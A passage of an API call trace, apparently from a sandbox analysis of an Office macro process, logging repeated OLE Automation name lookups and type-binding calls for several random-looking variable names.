pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.796] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LXcoUB1") returned 0x10a16a [0069.796] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="LXcoUB1" | out: _Dst="LXcoUB1") returned 0x0 [0069.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="LXcoUB1") returned 8 [0069.796] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.796] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="LXcoUB1", lHashVal=0x10a16a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.796] IUnknown:Release (This=0x665ba50) returned 0xd [0069.796] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.796] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="LXcoUB1", lHashVal=0x10a16a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.796] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.796] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.796] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="LXcoUB1", lHashVal=0x10a16a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.796] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.796] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.796] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="LXcoUB1", lHashVal=0x10a16a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.796] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8200e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="LXcoUB1") returned 8 [0069.796] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="LXcoUB1", lHashVal=0x10a16a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.796] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.796] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b8200e | out: _Dst=0x67c2d40) returned 0x0 [0069.796] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_LXcoUB1") returned 0x10956d [0069.796] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_LXcoUB1" | out: _Dst="_B_var_LXcoUB1") returned 0x0 [0069.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_LXcoUB1") returned 15 [0069.796] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.796] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_LXcoUB1", lHashVal=0x10956d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.796] IUnknown:Release (This=0x665ba50) returned 0xd [0069.797] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.797] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_LXcoUB1", lHashVal=0x10956d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.797] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.797] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.797] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_LXcoUB1", lHashVal=0x10956d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.797] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.797] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.797] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_LXcoUB1", lHashVal=0x10956d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.797] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.797] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.797] IUnknown:Release (This=0x665ba50) returned 0xd [0069.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87145e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_LXcoUB1") returned 15 [0069.797] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_LXcoUB1", lHashVal=0x10956d, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x55006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x55006f00000000, pDummy=0x0) returned 0x0 [0069.797] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8200e | out: _Dst=0x144ec0) returned 0x0 [0069.797] ITypeComp:RemoteBind (in: This=0x665ba60, szName="mADoko", lHashVal=0x1003f2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8205e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="mADoko") returned 7 [0069.797] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="mADoko", lHashVal=0x1003f2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8205e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="mADoko") returned 7 [0069.797] ITypeComp:RemoteBind (in: This=0x665bd30, szName="mADoko", lHashVal=0x1003f2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.797] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mADoko") returned 0x1003f2 [0069.798] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="mADoko" | out: _Dst="mADoko") returned 0x0 [0069.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="mADoko") returned 7 [0069.798] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.798] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="mADoko", lHashVal=0x1003f2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.798] IUnknown:Release (This=0x665ba50) returned 0xd [0069.798] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.798] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="mADoko", lHashVal=0x1003f2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.798] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.798] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.798] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="mADoko", lHashVal=0x1003f2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.798] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.798] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.798] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="mADoko", lHashVal=0x1003f2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.798] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8205e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="mADoko") returned 7 [0069.798] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="mADoko", lHashVal=0x1003f2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.798] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.798] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b8205e | out: _Dst=0x67c2d40) returned 0x0 [0069.798] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_mADoko") returned 0x107e9b [0069.798] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_mADoko" | out: _Dst="_B_var_mADoko") returned 0x0 [0069.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_mADoko") returned 14 [0069.798] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.798] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_mADoko", lHashVal=0x107e9b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.798] IUnknown:Release (This=0x665ba50) returned 0xd [0069.798] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.798] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_mADoko", lHashVal=0x107e9b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.798] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.799] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.799] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_mADoko", lHashVal=0x107e9b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.799] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.799] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.799] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_mADoko", lHashVal=0x107e9b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.799] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.799] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.799] IUnknown:Release (This=0x665ba50) returned 0xd [0069.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87148e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_mADoko") returned 14 [0069.799] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_mADoko", lHashVal=0x107e9b, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x6b006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x6b006f00000000, pDummy=0x0) returned 0x0 [0069.799] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8205e | out: _Dst=0x144ec0) returned 0x0 [0069.799] ITypeComp:RemoteBind (in: This=0x665ba60, szName="GAAxGAA", lHashVal=0x10e4f8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82086, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="GAAxGAA") returned 8 [0069.799] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="GAAxGAA", lHashVal=0x10e4f8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82086, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="GAAxGAA") returned 8 [0069.799] ITypeComp:RemoteBind (in: This=0x665bd30, szName="GAAxGAA", lHashVal=0x10e4f8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.799] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GAAxGAA") returned 0x10e4f8 [0069.799] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="GAAxGAA" | out: _Dst="GAAxGAA") returned 0x0 [0069.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="GAAxGAA") returned 8 [0069.799] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.799] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="GAAxGAA", lHashVal=0x10e4f8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.799] IUnknown:Release (This=0x665ba50) returned 0xd [0069.799] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.799] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="GAAxGAA", lHashVal=0x10e4f8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.800] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.800] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.800] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="GAAxGAA", lHashVal=0x10e4f8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.800] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.800] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.800] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="GAAxGAA", lHashVal=0x10e4f8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.800] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82086, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="GAAxGAA") returned 8 [0069.800] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="GAAxGAA", lHashVal=0x10e4f8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.800] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.800] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b82086 | out: _Dst=0x67c2d40) returned 0x0 [0069.800] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_GAAxGAA") returned 0x10e87c [0069.800] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_GAAxGAA" | out: _Dst="_B_var_GAAxGAA") returned 0x0 [0069.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_GAAxGAA") returned 15 [0069.800] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.800] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_GAAxGAA", lHashVal=0x10e87c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.800] IUnknown:Release (This=0x665ba50) returned 0xd [0069.800] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.800] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_GAAxGAA", lHashVal=0x10e87c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.800] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.800] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.800] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_GAAxGAA", lHashVal=0x10e87c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.800] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.800] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.800] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_GAAxGAA", lHashVal=0x10e87c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.800] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.801] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.801] IUnknown:Release (This=0x665ba50) returned 0xd [0069.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8714be, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_GAAxGAA") returned 15 [0069.801] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_GAAxGAA", lHashVal=0x10e87c, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x47005f00720061, ppTypeComp=0x47007800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x47005f00720061, ppTypeComp=0x47007800000000, pDummy=0x0) returned 0x0 [0069.801] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b82086 | out: _Dst=0x144ec0) returned 0x0 [0069.801] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wAAkBA", lHashVal=0x106880, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b820d6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wAAkBA") returned 7 [0069.801] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wAAkBA", lHashVal=0x106880, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b820d6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wAAkBA") returned 7 [0069.801] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wAAkBA", lHashVal=0x106880, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.801] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wAAkBA") returned 0x106880 [0069.801] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="wAAkBA" | out: _Dst="wAAkBA") returned 0x0 [0069.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="wAAkBA") returned 7 [0069.801] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.801] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wAAkBA", lHashVal=0x106880, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.801] IUnknown:Release (This=0x665ba50) returned 0xd [0069.801] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.801] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wAAkBA", lHashVal=0x106880, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.801] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.801] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.801] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wAAkBA", lHashVal=0x106880, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.801] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.802] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.802] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wAAkBA", lHashVal=0x106880, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.802] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b820d6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wAAkBA") returned 7 [0069.802] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wAAkBA", lHashVal=0x106880, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.802] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.802] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b820d6 | out: _Dst=0x67c2d40) returned 0x0 [0069.802] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wAAkBA") returned 0x10e329 [0069.802] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_wAAkBA" | out: _Dst="_B_var_wAAkBA") returned 0x0 [0069.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_wAAkBA") returned 14 [0069.802] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.802] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wAAkBA", lHashVal=0x10e329, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.802] IUnknown:Release (This=0x665ba50) returned 0xd [0069.802] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.802] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wAAkBA", lHashVal=0x10e329, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.802] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.802] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.802] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wAAkBA", lHashVal=0x10e329, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.802] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.802] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.802] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wAAkBA", lHashVal=0x10e329, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.802] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.802] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.802] IUnknown:Release (This=0x665ba50) returned 0xd [0069.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8714ee, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_wAAkBA") returned 14 [0069.802] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wAAkBA", lHashVal=0x10e329, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x42006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x42006b00000000, pDummy=0x0) returned 0x0 [0069.803] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b820d6 | out: _Dst=0x144ec0) returned 0x0 